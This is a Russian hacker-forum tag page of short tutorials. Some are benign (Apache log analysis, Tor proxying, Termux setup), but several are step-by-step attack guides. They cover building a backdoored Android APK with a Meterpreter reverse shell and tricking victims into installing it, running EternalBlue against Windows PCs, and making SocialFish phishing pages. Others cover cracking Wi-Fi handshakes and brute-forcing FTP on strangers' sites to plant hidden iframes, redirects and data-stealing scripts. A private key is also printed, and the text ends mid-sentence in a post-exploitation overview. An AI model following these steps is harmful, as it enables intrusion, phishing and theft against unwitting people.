Новости и объявления.
- Уважаемые гости. При посещении нашего сайта, просим вас ознакомиться с разделами форума, прежде чем оставлять ваши объявления и т.д. Рекомендуем посетить разделы: "Общение, Коммерческий раздел, Услуги Хакеров и статьи, Отзывы о сайте и пользователях, Черный список" и другие разделы нашего сайта. ***ВНИМАНИЕ*** При обращении за помощью, просим быть внимательными, на сайте есть, как проверенные специалисты, так и непроверенные. Если вы обратились к специалисту, который проверку НЕ проходил, рекомендуем воспользоваться услугой гарант сервиса. XAKERSAY.COM
Search the Community
Showing results for tags 'линукс'.
-
Приветствую, хакеры! В данной небольшой статье я хочу рассказать вам об очень полезном инструменте для Kali Linux, а именно про такую утилиту как ARTLAS. ARTLAS - Это утилита для анализа логов Apache в реальном времени. Принцип работы построен на 10 важнейших уязвимостях по классификации OWASP. Данный инструмент выявляет практически все возможные попытки эксплуатации ваших веб-приложений и способен уведомить вас напрямую через Telegram, Zabbix или Syslog/SIEM. Поддерживаемые веб-сервера: Apache, Apache vHost. Установка: 1. git clone https://github.com/mthbernardes/ARTLAS 2. cd ARTLAS/ 3. sudo pip2 install -r requirements.txt Необходимо отредактировать файл artlas.py. Для этого откройте его и выполните следующие действия: 1. gedit artlas.py 2. Найдите там строку: "http://dev.itratos.de/projects/php-ids/repository/raw/trunk/lib/IDS/default_filter.json" 3. Замените её на: "https://raw.githubusercontent.com/PHPIDS/PHPIDS/master/lib/IDS/default_filter.json" 4. Сохраните и закройте файл. Вся информация предоставлена лишь для ознакомления и не призывает к действиям. Автор не несет ответственности за использование этой информации.
-
Приветствую, хакеры! В данной небольшой статье я хочу рассказать вам о том, как с помощью Kali Linux можно взламывать дроны, а именно с помощью специальной программы. DroneSploit - это среда командной строки, основанная на sploitkitи попытка собрать методы взлома и эксплойты, особенно ориентированные на взлом дронов. Для простоты использования интерфейс имеет макет, похожий на Metasploit. В настоящее время он поддерживает только очень небольшое количество моделей дронов, но мы надеемся, что в ближайшем будущем мы будем приветствовать новые предложения. Потребуется: 1. Linux система 2. Wi-Fi карта с режимом монитора (многие Wi-Fi адаптеры поддерживают этот режим) Установка: sudo pip install dronesploit Использование: dronesploit Поздравляю, теперь буквально в несколько нажатий вы способны провести атаку практически на любой дрон и попытаться его взломать. Это очень мощный инструмент, которым может пользоваться как новичок, так и опытный взломщик. Подобная программа будет незаменимой в арсенале хакера. Вся информация предоставлена лишь для ознакомления и не призывает к действиям. Автор не несет ответственности за использование этой информации.
-
Если при установки Kali Linux на персональное устройство Вы использовали опцию шифрования системного раздела, то при каждом запуске Kali требует от ваш мастер-ключ, который позволяет загрузится системе, и полностью расшифровать системный раздел. Весь процесс осуществляется с помощью системной утилиты под названием cryptsetup. Давным давно в Kali Linux была добавлена опция Nuke, которая служит своеобразным патчем для cryptsetup. С помощью данного патча Вы можете создал специальный пароль, при вводе которого самоуничтожаются ключевые слоты, из-за чего все зашифрованные данные станут недоступными для каких-либо взаимодействий. Для того, чтобы включить опцию Nuke, выполняем следующую команду: cryptsetup luksAddNuke Например, если мой зашифрованный раздел называется /dev/sda3, то команда будет выглядеть следующим образом: cryptsetup luksAddNuke /dev/sda3 После выполнения данной команды cryptsetup сначала предложит ввести пароль, который используется для зашифрованного раздела, а после предложит ввести пароль для самоуничтожения. Теперь если при запуске системы мы введем пароль для самоуничтожения, то cryptsetup уничтожит ключевые слоты, чтобы никакой злоумышленник не смог получить доступ к зашифрованным данным, даже если он выпытал у нас мастер-ключ от защищенного раздела. Вся информация предоставлена лишь для ознакомления и не призывает к действиям. Автор не несет ответственности за использование этой информации.
-
В этой статье вы узнаете как перенаправить весь трафик на linux через tor. Итак, есть два варианта юзать сеть ТОR в качестве прокси, перед этим надо установить TOR. 1. Proxychains Proxychains - это утилита, позволяющая перенаправлять TCP траффик через множество прокси-серверов, образуя цепочку. Данная программа по умолчанию встроена в Kali Linux. Благодаря данному способу можно пропускать траффик только той программы, которую мы укажем в консоли. Настроим Proxychains: leafpad etc/proxychains.conf И прописываем в конце файла следующие строки: Строки: socks4 127.0.0.1 9050 (в моем случае эта строка уже стояла) socks5 127.0.0.1 9050 А в начале документа необходимо указать одну из следующих опций: #dynamic_chain (соединение будет осуществляться через определённые цепочки прокси)#strict_chain (трафик проходит постепенно через всю цепь прокси, и если один из прокси окажется нерабочим, может не работать всё соединение)#random_chain (каждый раз происходит подключение через разные цепочки прокси) Сохраняем документ. Теперь вводим в консоли следующие команды: tor Proxychains [программа, которую необходимо запустить через TOR] 2. Privoxy Как гласит Википедия, Privoxy - это свободный веб-прокси с расширенными возможностями фильтрования интернет-контента для защиты конфиденциальности (приватности) пользователей сети Интернет. Privoxy, в отличие от Proxychains, перенаправляет весь трафик через сеть TOR. Итак, устанавливаем Privoxy: apt-get install privoxy И настраиваем: leafpad etc/privoxy/config В самом конце прописываем следующие строки: forward-socks5 / localhost:9050 . forward-socks4 / localhost:9050 . forward-socks4a / localhost:9050 . После чего сохраняем файл и переходим к настройкам менеджера подключений. Заходим в Настройки — Сеть — Сетевая прокси служба. Выбираем метод ручной. Bбиваем в Http и Https - localhost порт — 8118. В узел Socks - localhost порт — 9050. На этом настройки завершены (убедитесь, что вид прокси установлен вручную). Осталось запустить сервисы следующими командами: service tor start service privoxy start Вся информация предоставлена лишь для ознакомления и не призывает к действиям. Автор не несет ответственности за использование этой информации.
-
Приветствую хакеры, наверно каждый из вас хоть раз хотел взломать смартфон, удалённо прослушивать разговоры, просматривать SMS и т.д. И это вполне возможно сделать. В этой статье я вам расскажу и покажу (скриншоты), как можно получить доступ к Android-смартфону. Кое-что об Android Начну с того, что что Android является ОС на базе ядра Linux, а это много чего означает. Все возможности, которые у вас есть на десктопной версии, есть и на андроид смартфонах. Тут дело в удобстве. Взлом андроид смартфона не сложнее чем взлом операционной системы, будь-то Linux или Windows. Всегда можно загрузить вредоносное приложение, через которое мы откроем бэкдор и сможем войти в систему удалённо. Есть также возможность прослушивать телефон через открытые порты. Таким вариантом мы сегодня и воспользуемся. Итак, начнем! Для взлома нам для этого понадобится: Скрипт Evil-Droid; Открытый порт; ПК с установленным Kali Linux или загрузочная флешка. Взлом андроид смартфонов – установка и запуск компонентов Скачиваем архив или копируем его через терминал в необходимое место. git clone https://github.com/M4sc3r4n0/Evil-Droid.git Далее переходим в папку и даём права на исполнение файлу evil-droid chmod +x evil-droid Запускаем скрипт и генерируем вредоносный apk с бэкдором sh evil-droid Генерировать можно как файл под номером 2, так и 3. Я пользуюсь третьим, версия подойдёт для андроид устройств с более хорошей безопасностью. Для смартфонов с версией андроид 3-5 подойдёт и 2 пункт. Перед нами появилось меню для настройки apk, которым мы будем пользоваться для взлома андроид. Пункты, которые нам нужно настроить: ip-адрес – на выбор локальный и глобальный, используйте глобальный, если атакуемый смартфон будет не у вас в локальной сети. set lport – установка порта, тут вы можете выбрать любой, главное чтобы он был открыт. Иначе прослушать смартфон не получится. Как просканировать порты в вашей сети – читать. Метод прослушки – я рекомендую использовать android/meterpreter/reverse_tcp, так как мы будем использовать metasploit для управления. Выбор папки, куда будет сгенерирован вредоносный apk. Генерация вредоносного apk. Всё сделано. Для того, чтобы произошел взлом андроид смартфона и вы могли им управлять, необходимо установить evilapk на атакуемый смартфон. Тут методов много и придётся использовать СИ. Далее мы запускаем скрипт ещё раз и выбираем пункт – start listening. Зараженный смартфон появиться в списке и в открытом окне появится возможность ввести команды управления. Для того, чтобы получить их список воспользуйтесь параметром –help или -h (идентичны). Для лучшего восприятия процесса взлома прикрепляю скриншоты Вся информация предоставлена лишь для ознакомления и не призывает к действиям. Автор не несет ответственности за использование этой информации.
-
Сегодня мы будем работать с таким сканером веб-серверов как Nikto. У меня Parrot OS со встроенным Nikto, но вам придётся скачивать, если у вас обычный Линукс. С помощью него вы способны проверить сервера на ошибки, неверные настройки, дефолтные файлы и на уязвимости. Скажу сразу, что Nikto не создавался быть незаметным и его активность останется в логах сервера и попадёт в поле зрения IPS/IDS(система обнаружения и предотвращения вторжений). Советую работать через прокси. Обновляем пакеты ОС и клонируем репозиторий с GitHub'а: sudo apt update git clone https://github.com/sullo/nikto.git Всегда перед использованием обновляйте Nikto: nikto -ubdate nikto -update Тут нам представили некоторые аргументы к командам. Сегодня мы их тоже разберём. Плюс(+) значит требуется значение. То же самое вы увидите в результате аргумента "-h"(-help) И так, заходим в директорию и введём первые команды: cd nikto nikto -host www.CyberCat.uz Тут нам нужно указать хост сайта(IP или домен). Если вы хотите указать свой порт, то добавляете его "-p"(-port): nikto -host www.CyberCat.uz -p 443 Если вы вводите IP адрес, то порт можно указать так: 111.111.11.11:443 Или перечислением: nikto -host www.CyberCat.uz -p 88,443,80 также можно указать диапазон: - p 80-90 Вы можете ещё указать несколько хостов для сканирования на одну сессию nikto. Для этого вам нужно создать текстовой файл с прописанными хостами внутри и вызвать его в команде с указанием полного пути. Хосты должны быть перечислены на каждой строке. Чтобы сохранить отчёт о сканировании, нужно под аргументом "-o"(-output) указать куда кидать отчёт и выбрать формат под аргументом "-Format": nikto -host www.CyberCat.uz -o ~/CyberCatTest.html -Format htm Форматы могут быть следующие: html, csv, txt, sql, nbe, xml. Если формат не указан, то он будет взят из расширения файла с аргументом "-о" Nikto сначала начинает скан через HTTP и если он замечает SSL сертификат,он переходит на HTTPS. Если вы точно знаете что сайт имеет SSL, вы можете сразу начать скан через HTTPS с помощью аргумента "-ssl", дабы сохранить время. А аргумент "-nossl" отключает использование ssl Аргумент "-Tuning+": 1 Интересные файлы/Увиденные в логах 2 Неправильно настроенные/Дефолтные файлы 3 Раскрытие информации 4 Инъекция (XSS/Script/HTML) 5 Удалённое извлечение файлов — Внутри корня веб 6 Отказ в обслуживании 7 Удалённое извлечение файлов — По всему серверу 8 Выполнение команд/Удалённый шелл 9 SQL-инъекция 0 Выгрузка файлов a Обход аутентификации b Идентификация программного обеспечения c Удалённое внедрение кода d Веб-служба e Административная консоль x Обратное значение опций настройки т. е. включить всё, кроме указанного) Один из примеров вывода со значением Tuning. Тут я проверил наличие уязвимостей на инъекции (XSS/Script/HTML) По дефолту запросы отправляются каждые 10 секунд, а с аргументом "-timeout+" вы сможете сами обозначить тот самый таймаут. Как я сказал в начале, активность вашего скана будет замечена в логах,поэтому вам лучше использовать прокси. Это может быть любой ваш прокси или что-то, что обеспечивает вам какую-то анонимность. Также вы можете работать через прокси прямо в консоли введя аргумент "-useproxy" и Аргумент "-Display+" позволяет включить или отключить отображение вывода: 1 Показать редиректы 2 Показать полученные кукиз 3 Показать все ответы 200/OK 4 Показать URL, которые требуют аутентификацию D Отладочный вывод E Отобразить все HTTP ошибки P Печатать прогресс в STDOUT (стандартный вывод) S Собрать из вывода IP и имена хостов V Вербальный вывод Также, если вы добавите аргумент "-dbcheck", то база данных проверится на ошибки синтаксиса. "-404code" позволяет игнорировать HTTP коды. Формат: 302,301Аргумент "-id+" позволяет использовать аутентификацию на хосте, формат id:pass или id:pass:realm "-mutate+" Предположить дополнительные имена файлов: 1 Проверить все файлы по всем корневым директориям 2 Предположить имена файлов с паролями 3 Перечислить имена пользователей через Apache (запросы вида /~user) 4 Перечислить имена пользователя через cgiwrap (запросы типа /cgi-bin/cgiwrap/~user) 5 Попытаться брут-форсить имена субдоменов, предположить, что имя хоста является родительским доменом 6 Попытаться угадать имена директорий из вашего словаря Я никого ни к чему не призываю, статья написана в ознакомительных целях!
-
Привет, хакеры, во множестве статей используется Termux, поэтому решено, необходимо рассказать, что нужно для дальнейшей работы, давайте настроим Termux. Termux —терминала на андроид. С помощью которого устанавливается и производится работа с некоторыми утилитами. Также установив какую-нибудь ОС на виртуалку,вы сможете пользоваться её терминалом прямо в Termux. Теперь понимаете насколько это удобно? Первым делом скачиваем Termux с Play Market. Чтобы понять как туда попасть, придётся загуглить(будет сложно, не сдавайтесь). В процессе установки загрузка может приостановиться и попросить вас ввести Да или Нет (y/n). Вы всегда вводите y, чтобы разрешить продолжить. Заходим и пишем по очередно: apt upgrade Сейчас мы обновили установленые пакеты. apt install git apt install python && python2 apt install nano apt install unzip nano — текстовой редактор python нам нужен, чтобы в будущем устанавливать и запускать утилиты на python. unzip позволяет открывать zip архивы в терминале. apt install bash bash нам понадобится для запусков файлов .sh apt install pip pip нам понадобится для установки инструментов через pip Я никого ни к чему не призываю, статья написана в ознакомительных целях!
-
- установка termux
- настройка termux
- (and 9 more)
-
Привет, хакеры, в данной статье расскажу о способе взлома компьюетра, позволяющий управлять камерой, перезагрузкой и всеми другими компонентами ПК. Установка Termux Способ будет показан через телефон, поэтому необходимо скачать и установить Termux из плей маркета. Устанавливаем все необходимые библиотеки: pkg update pkg install wget Следующим этапом загружаем Metasploit git clone https://github.com/gushmazuko/metasploit_in_termux.git Далее клонируем его и производим запуск cd metasploit_in_termux chmod +x metasploit.sh ./metaslploit.sh Ожидаем установки. После завершения загрузки, будет необходимо ввести букву Y, что будет означать – да. Если у вас достаточно хороший телефон, то проблем с установкой не возникнет. Взлом компьютера Атака на компьютер производится при помощи известного и популярного эксплойта EternalBlue. Однако, необходимо сначала получить собственный ип-адрес. Для этого переходим в термукс и вводим следующую команду: ip addr show Видим всю необходимую информацию для продолжения. После получения собственного ип-адреса, необходимо запустить консоль данной командой: $ msfconsole После ввода видим подобную картину: Когда консоль откроется, можно начать выбор необходимого эксплойта. Прописываем данную команду: use exploit/windows/smb/ms17_010_eternalblue Отлично, эксплойт выбран. Задаем ип-адрес нашей жертвы и прописываем команду: set RHOST IP Далее создаем payload set payload windows/meterpreter/reverse_tcp После задаем собственный ип-адрес, который узнали ранее. set LHOST IP Вводим следующую команду: set LPORT 4444 Отлично, теперь вы получили консоль, которая позволит управлять другим компьютером.
-
О, брат, ты снова зашёл на мою статью? Окей, значит ты зашёл именно туда, куда нужно. Сейчас я хочу познакомить с фишинговым инструментом SocialFish. Он позволяет легко создавать фейк-страницы самых популярных веб-сайтов, таких как Instagram, Twitter, Github и т.д. Установка Клонируй это из Github в Termux. git clone https://github.com/An0nUD4Y/SocialFish.git Перейди в папку SocialFish, установите требования, измените режим файла python и выполните: cd SocialFish apt install python3-pip // Если не установлено pip3 install -r requirements.txt // Если не установлено chmod 777 SocialFish.py ./SocialFish.py Возможно, у вас появится вот такая ошибка. Если она у вас появилась, то делаем следующее: pkg up pkg install curl pkg install php Соглашаемся и продолжаем: После установки мы запускаем SocialFish заново и соглашаемся: После того, как вы ответите на вопросы, вы увидите доступные варианты страниц: FACEBOOK PHISHINGИНСТАГРАМ ФИШИНГСНАПЧАТ ФИШИНГYAHOO PHISHINGДВИЖЕНИЕ ФИШИНГАMICROSOFT PHISHINGПАРНЫЙ ФИШИНГВК ФИШИНГICLOUD ФИШИНГ Можете использовать любой. Ничего сложно в этом нет. Предупреждаю, что данная статья предназначена лишь для ознакомления и не призывает к действиям.
-
Приветсвую, хакеры, в данной статье расскажу об аналоге обычной файловой системе, которая имеет отличительную черту – pingfs. Ее фишкой является сохранение всей информации в сети, в виде ICMP пакетов, которые отправляется от пк к серверам. Сервис создан при помощи API и Filesystem in userspace. Значит, что для запуска данной системы необходимы права superuser. Единственная операционная система поддерживающая данный тип файловой системы – Linux. Поддержка есть как у протоколов IPv4 так и IPv6. Работа с сервисом Чтобы скомпилировать сервис нужно прописать make в папке с инструментом. Для начала использования, нужно: Создать текстовый документ, название который установить в соответствии в название хоста и ип-адресомВключить инструмент с полученными рут-правами, сделав при помощь команды: ./pingfs “название документа” ”точка монтирования”. После программа начинает сканировать хосты на верность реакции, отправляя сразу несколько пингов. На экране выводятся некие данные и статистика, после чего файловая система будет успешно смонтированаПрограмма не закрывается и продолжает создавать динамику отправки пакетов и байтов постоянно.Для прекращения работы инструмента: Нажимаем Ctrl + CЕсли же не работает, пишем fusermount –u. Возможные операции Сохранение и удаление файловИх списокИзменения названияЧтение и записьНастройка и изменения прав доступаНевозможные операции Сохранение и удаление каталоговСохранение ссылок на файлыОтметкиСоздатель системы говорит, что сегодня скорость локальных хостов очень маленькая. Часто передача информации грозит потерей пакетов, поэтому стоит с осторожностью относится к данной файловой системе.
-
Часто люди задаются вопросом, а почему Линукс практически неуязвим к вирусам, почему хакеры сидят именно на нем? Каким образом оно не взламывается? Существует несколько пунктов, которые подтверждают этот факт, в данной статей будет написано 7 таких причин. 1. Популярность ОС Windows для персональных компьютеров гораздо выше, чем на серверах, где используется Linux. 2. Всю работу на линуксе пользователь изначально выполняет под пользователем, не имеющим привилегий. Рут доступ к изменению файлов системы выполняется только самой операционкой. Обычный человек имеется право только для чтения системных файлов, это позволят иметь хорошую защиту от вирусов, вредоносные программы не могут изменять внутренние файлы. 3. Операционка имеет другую подсистему прав, в отличии от виндовс не имеется реестра, настройки программ сохранятся по адресу /etc, обычный юзер владеет только правами чтения. В Windows для работы большого количества приложений требуется доступ к записи системных файлов. Это означает, что вирус не сможет изменить никаких строк в компьютерной системе. 4. Допустим если человек запустил вирус, удаляющий данные с компьютера, то самой серьезной бедой будет удаление информации домашнего каталога. Удаление системы произойти не может. Пользователь может запустить вредоносную программу, запускающую сервис, подключающий юзера к определенному хосту для извлечения важных данных. Перезагрузив устройство вредоносный код не запустится автоматически. Отсутствует возможность изменения скриптов внутренней части, чем часто пользуются малвари. 5. Люди владеющие Unix-подобными системами очень компетентны, значит они намного лучше производят контроль. 6. Линукс имеет мощнейший Firewall являющийся компонентом ОС. Произведя хорошую настройку можно добиться существенного повышения безопасности. 7. Программы никогда не запускаются самостоятельно, важнейшая часть безопасности подобных операционок.
-
Всем привет, сейчас расскажу об отличном инструменте, который поможет вам во взломе WiFi – wifite. Это крайне маленький гайд, все предельно просто и ясно даже новичку. Данную утилиту можно найти по стандарту в кали линукс, поэтому спокойно этот способ подойдет даже для телефонов. Вся информация лишь для ознакомления и возможного создания безопасной оболочки от взломов. Способ взлома весьма стандартный, перехват хеша и деаутентификация. Главный плюс инструмента, то что всю работу он берет на себя и автоматизирует процесс ввода команд. Начнем 1. Запускаем кали 2. Открываем консоль и устанавливаем пользовательскую версию программы, так как стандартная уже не обновляется. 3. Когда будет установлена, пишем – cd wifite2 и заходим в корень к инструменту 4. Чтобы запустить: ./Wifite.py Наша карта теперь автоматом перевелась в режим мониторинга, моментально сканируются ближайшие сети, ожидаем обнаружения нужной. 5. Выбираем сеть, которую собираемся подвергнуть атаке. 6. Клацаем ctrl+c прописываем номер сети или несколько номеров. 7. Начинается деаутентификация и перехват хэндшейков, ожидаем некоторое время. После перехвата мы увидим уведомление, если выбрано несколько сетей, процесс повторяется для каждой сети. 8. Полученный хеш мы можем расшифровывать любым доступным способом.
-
Здарова всем, сейчас расскажу и покажу как создать свой onion сайт в сети TOR, располагаться который будет прямо на установленной Kali Linux, никаких хостингов! Но, он будет работать только тогда, когда вы его запустите. Если вы хотите иметь красивый адрес вашего сайта, то начинаем сразу с первого пункта, если это вас не интересует – со второго. Пункт 1 Для работы нам нужна именно старая версия Кали. Для примера я буду использовать 1.0.6 На дальнейших версиях не работала. Найти можно в различных архивах. Нарезаем на болванке или же создаем live usb. Загружаем систему. Ждем подключения сети. После чего за работу возьмется Shallot. Shallot даст вам возможность создавать адреса .onion с определенными настройками. Косок адрес может быть случайным. Для установки делаем следующее. Скачаем Shallot с github Код: wget https://github.com/katmagic/Shallot/archive/master.zip Переходим в директорию Код: cd Shallot-master Дальше Код: ./configure make Производим запуск для примера Код: ./shallot ^name ------------------------------------------------------------------ Found matching domain after 30493976 tries: penistfobso4wxhr.onion ------------------------------------------------------------------ -----BEGIN RSA PRIVATE KEY----- MIICXgIBAAKBgQC+dO6h1GjQD0Hqn2LLBX0kIA9px/CtxV5yxMCjbk773igLvXDu v7N9Kr1FYB+yKuSWL/aCZttLqiqUA4L3cxI5Dgtk3bRKkmZre9qfH9xU9v+RSr5P BQmtp0AMi2wLiZxGggkoqcdIhKC4WWoD1xks0H//f7D+G+rdh4IMOHj7kQIEAPC0 RQKBgAwEVw9kxxu/SIugn3dDXJ2tq8V/uGNMBm02MnhckgvIS6S9wfB60mjy3FG/ SUPCWE/f5pUx8fNb3aPnIg2C5FlSE8hAfzdVBIP5F3S2KacSeCL+DPgCpcM8Tkfh s5AaqHe5Z+cb2pLE/1VXQpnnSQhLuSQFresIMCxnaBjOizzJAkEA4laycqQo2Guu eGkppcdNDRnlI4+bCslp2C4ZOuv8/DaLsQ/UE+RMrhdmJi48bcGBafcQlfewdyvL FpF6cpzjtQJBANdqdFilmRwCi1Ij4Q3dBubjjo5+WzxeZ0A6M6g5HDPFZBuHoXtI LNbSz5ilriQQ8fhKZi1HpwVWhNNLyIB3me0CQCdn1d98SwNP+gIfyvYT5ufxoBfH ElngrkQr4rYhsbCmSorxfen9gxI1hQVy4DsbTfttzSwJmOZ5P/CBG+HPFjUCQQCB gWh+P0wOCUDfkRDXdVd1Tb/7nbPbk8r+VlVgnz7fMNPYzjVkq2DTsRvk8uWTdMwQ bTDrrSiO0Wv5zxmMocT9AkEAkLfNSgZafRVmipGo9Fn78ZqedvZAqfYkwXgoIfrB MEq+FK1D3nyY9QDukbe6uR7k8gTfqTtqiHwIQ5JX7u6v7w== -----END RSA PRIVATE KEY----- Строку “name” заменяется на любое имя, которое захотите. Не забывайте, что чем длиннее слово, тем больше времени понадобится для генерации. Лучше всего не больше 6 символов. Полученные данные нужно сохранить в текстовый документ и сохранить на внешнем носителе. Пункт 2 В терминале вводим по порядку: Код: apt-get install tor apt-get install lighttpd Потом запускаем tor и lighttpd Код: service tor start service lighttpd start Необходимо чтобы они сделали конфигурации, для этого в etc, tor, torrc расскоментируем и привидем к такому виду строчки: Код: HiddenServiceDir /var/lib/tor/hidden_service/ HiddenServicePort 80 127.0.0.1:8080 А ниже впишем вот это: Код: ExcludeNodes {ru}, {ua}, {be} В /var/lib/tor/hidden_service имеется два файла hostname и private_key В первом файле записано имя вашего сайта, а во втором уникальный код. Если пункт 1 не был вами выполнен, то вы должны получить вывод в текстовом документе. Из него нам и нужно вписать необходимые значения. Если вы начинали со 2 пункта, то можете ничего не трогать. К примеру в hostname впишем nameforbso3xx.onion а в private_key: Код: -----BEGIN RSA PRIVATE KEY----- MIICXgIBAAKBgQC+dO6h1GjQD0Hqn2LLBX0kIA9px/CtxV5yxMCjbk773igLvXDu v7N9Kr1FYB+yKuSWL/aCZttLqiqUA4L3cxI5Dgtk3bRKkmZre9qfH9xU9v+RSr5P BQmtp0AMi2wLiZxGggkoqcdIhKC4WWoD1xks0H//f7D+G+rdh4IMOHj7kQIEAPC0 RQKBgAwEVw9kxxu/SIugn3dDXJ2tq8V/uGNMBm02MnhckgvIS6S9wfB60mjy3FG/ SUPCWE/f5pUx8fNb3aPnIg2C5FlSE8hAfzdVBIP5F3S2KacSeCL+DPgCpcM8Tkfh s5AaqHe5Z+cb2pLE/1VXQpnnSQhLuSQFresIMCxnaBjOizzJAkEA4laycqQo2Guu eGkppcdNDRnlI4+bCslp2C4ZOuv8/DaLsQ/UE+RMrhdmJi48bcGBafcQlfewdyvL FpF6cpzjtQJBANdqdFilmRwCi1Ij4Q3dBubjjo5+WzxeZ0A6M6g5HDPFZBuHoXtI LNbSz5ilriQQ8fhKZi1HpwVWhNNLyIB3me0CQCdn1d98SwNP+gIfyvYT5ufxoBfH ElngrkQr4rYhsbCmSorxfen9gxI1hQVy4DsbTfttzSwJmOZ5P/CBG+HPFjUCQQCB gWh+P0wOCUDfkRDXdVd1Tb/7nbPbk8r+VlVgnz7fMNPYzjVkq2DTsRvk8uWTdMwQ bTDrrSiO0Wv5zxmMocT9AkEAkLfNSgZafRVmipGo9Fn78ZqedvZAqfYkwXgoIfrB MEq+FK1D3nyY9QDukbe6uR7k8gTfqTtqiHwIQ5JX7u6v7w== -----END RSA PRIVATE KEY----- В /etc/lighttpd/lighttpd.conf поменяем значения: Код: server.document-root = "/var/www/onion" server.error-handler-404 = "/404.php" server.tag = "Ваше значение" server.port = 8080 $HTTP["remoteip"] !~ "127.0.0.1" { url.access-deny = ( "" ) } server.dir-listing = "disable" Пункт 3 Мы находимся во времена технологий, поэтому использовать движки можно в широких направлениях, в которых необходимы PHP и MySQL, поэтому прямо сейчас мы их добавим. Начнем с установки PHP Код: apt-get install php7.0-cgi Далее в /etc/php/7.0/cgi/php.ini ищем и потом раскомментируем строку: Код: cgi.fix_pathinfo = 1 Теперь в lighttpd нам нужно включить поддержку PHP Код: lighttpd-enable-mod fastcgi lighttpd-enable-mod fastcgi-php Пункт 4 В данном пункте мы установим на наш сайт MySQL, а также модуль PHP позволяющий работать вместе с ним. Код: apt-get install mysql-server php7.0-mysql Изначально MySQL использует для кодировки latin1, хотя многие другие движки работают с UTF-8. Поэтому нам нужно открыть /etc/mysql/my.cnf и добавить в секции [client] и [mysqld] данные строки: Код: [client] default-character-set=utf8 [mysqld] character_set_server=utf8 collation_server=utf8_unicode_ci Пункт 5 В /vat/www/ необходимо создать папку onion. Там мы будем размещать наш сайт. Создаем HTML-страницу для проверки, после чего сохраняем ее под названием index.html Код: Тестовая страница Site Local Тестовая страница. Веб-сервер работает и настроен правильно. Создаем PHP страницу ошибки и сохраняем ее как 404.php Код: 404 Site Local Ошибка 404. Страница не найдена. Произведем перезапуск службы: Код: service tor restart service lighttpd restart service mysql restart Пункт 6 В браузере TOR заходим на наш созданный onion-адрес и сразу замечаем результаты! Было бы неплохо в /root/***/tor-browser_en-US/Browser/TorBrowser/Data/Tor/torrc в самом низу добавить строчку ExcludeNodes {ru}, {ua}, {be} Для запуска сайта вводим строки в терминал: Код: service tor start service lighttpd start service mysql start Установим tor-arm который позволит управлять и вести контроль над трафиком Код: apt-get install arm
-
Всем привет, в этой статье речь снова пройдет про взлом, однако теперь взламывать мы будем сайты с помощью FTP. Рассказывать о конкретных ресурсах я не собираюсь, так как поиск жертвы лежит на ваших плечах. Безусловно, администраторы сайтов могут быть не такими глупыми и просто закрывают все порты, устанавливают сложные пароли на различные интерфейсы и так далее. Такой сайт взломать станет намного сложнее. Однако, никогда не стоит забывать, что абсолютной защиты не существует. Что-то созданное человеком, им же и взламывается, особенно если учитывать тот факт, что чаще всего администраторы не закрывают порты, не производят привязку по ИП и устанавливают ненадежные пароли. Также не производят обновление программного обеспечение. Этот факт является очень плохим для жертвы, а для нас очень хорошим. Первым делом сканирование портов. Существует множество программ, как автоматизированные сканеры, так и самописные скрипты, если говорить коротко, то их большое множество. Если вы обладаете большим мастерством в хакинге, то можете использовать Kali Linux со встроенными утилитами. Если немного отвлечься, то Kali Linux невероятная операционка, которая позволяет проводить огромное множество манипуляций для взлома. Чтобы сканировать порты я взял программу NMAP Итак, переходим в консоль и записываем следующее: Nmap –p 21 [ип жертвы] Если порт будет открыт, ты мы увидим вот это: По стандарту для подключения по FTP нужен логин и пароль, однако в некоторых случаях можно зайти и анонимно. Чтобы найти этот анонимный вход хакеру нужно воспользоваться metasploit: use auxiliary/scanner/ftp/anonymous set rhosts [ип жертвы] exploit Если в этих строках вы заметили слово READ то можете поздравить себя, так как это значит, что подключится к FTP можно без логина и пароля. Подключаемся к серверу Чтобы осуществить это вы можете использовать любую программу, просто записываем ИП адресс сайта жертву, порт 21 и любой произвольный логин с паролем. Если прошлые пункты прошли успешно, то все должно работать. Итак, а что если совершить анонимный вход невозможно? В таком случае мы опять обращаемся к metasploit и вводим следующий код: use auxiliary/scanner/ftp/ftp_login set rhosts [ip жертвы] set user_file /root/docs/user.txt set pass_file /root/docs/pass.txt set stop_on_success true exploit Да, вы все правильно поняли, мы будем брутить с помощью metasploit’а В текстовых документах user и pass будут сохранятся произвольный логины и пароли пользователей. Их легко найти целыми пачками в интернете, причем не вкладывая ни копейки. Поиски не затянутся, а найти можно паки с более 10 млн записей. Когда вы получили доступ к FTP вы сможете заполучить очень ценные БД, после чего слить их на специальных ресурсах или же вы можете внедрить какой-нибудь вирус. Не будем жестить, поэтому рассмотрим самые стандартные варианты: • Внедрение iframe с вашей партнерской программы размеров в 1 пиксель, за которые вы будете получать деньги. • В каком-либо HTML-файл на сайте установить перенаправление на необходимый вам ресурс. • Установка в какую-либо часть сайта скрипт, который будет запрашивать информацию пользователя. • Также огромное множество других вредоносных кодов. Это все что я хотел рассказать сегодня. Я не призываю никого к действиям, а лишь хочу обезопасить владельцев сайтов, показа как легко обходятся различные защиты.
-
Друзья, сегодня минимум слов, максимум дела! В материале ниже будем смотреть инструменты пост-эксплуатации для систем Linux! Что можно сделать после того как ты уже прорвался во внутренний периметр сети, или, как на CTF-соревнованиях, когда ты получил доступ к уязвимой тачке и готов броситься в бой дальше! Пост-эксплуатация в практике пен-теста Пост-эксплуатация (англ. post-explotation) — это то, что можно сделать с целевой системой после того, как удалось найти уязвимость и выполнить какой-то участок кода на целевой системе. Так же под этим термином понимается один из этапов взлома компьютерных систем (фаза) позволяющая собирать дальнейшую информацию о целевой системе, получить дальнейший доступ к сети и хранящимся данным. Фаза пост-эксплуатации позволяет идентифицировать такие вещи, как дополнительные подсети, маршрутизаторы, названия серверов, сетевых служб и установленных приложений. Фазы (этапы) проведения тестирования на проникновение Основные паттерны, по которым работают злоумышленники на этапе пост-эксплуатации: получить доступ на выполнение произвольного кода\команд изучение данных, хранящихся на сервере перехват данных, которых нет на системе сейчас, но они могут появиться в будущем организация перманентного доступа к целевой системе эскалация привилегий до уровня системы для непривилегированной учетной записи Дополнительно, хакер может получать информацию о скомпрометированной системе, анализируя следующие параметры: конфигурацию системы (логин и пароль к БД в исходных кодах) конфигурацию веб-сервера (например, httpd.conf, .htaccess) исходные коды приложения (поиск уязвимостей, анализируя логику приложения) доступы к окружению (находясь внутри сети может быть проще попасть на соседние сервера и изолированные сегменты подсети) базы данных (аутентификационная информация к другим системам, хранящаяся в них Обзор инструментов пост-эксплуатации Мы же в материале сделаем акцент на рассмотрение инструментов пост-эксплуатации исключительно под Linux-системы. 1. PXEenum — полное 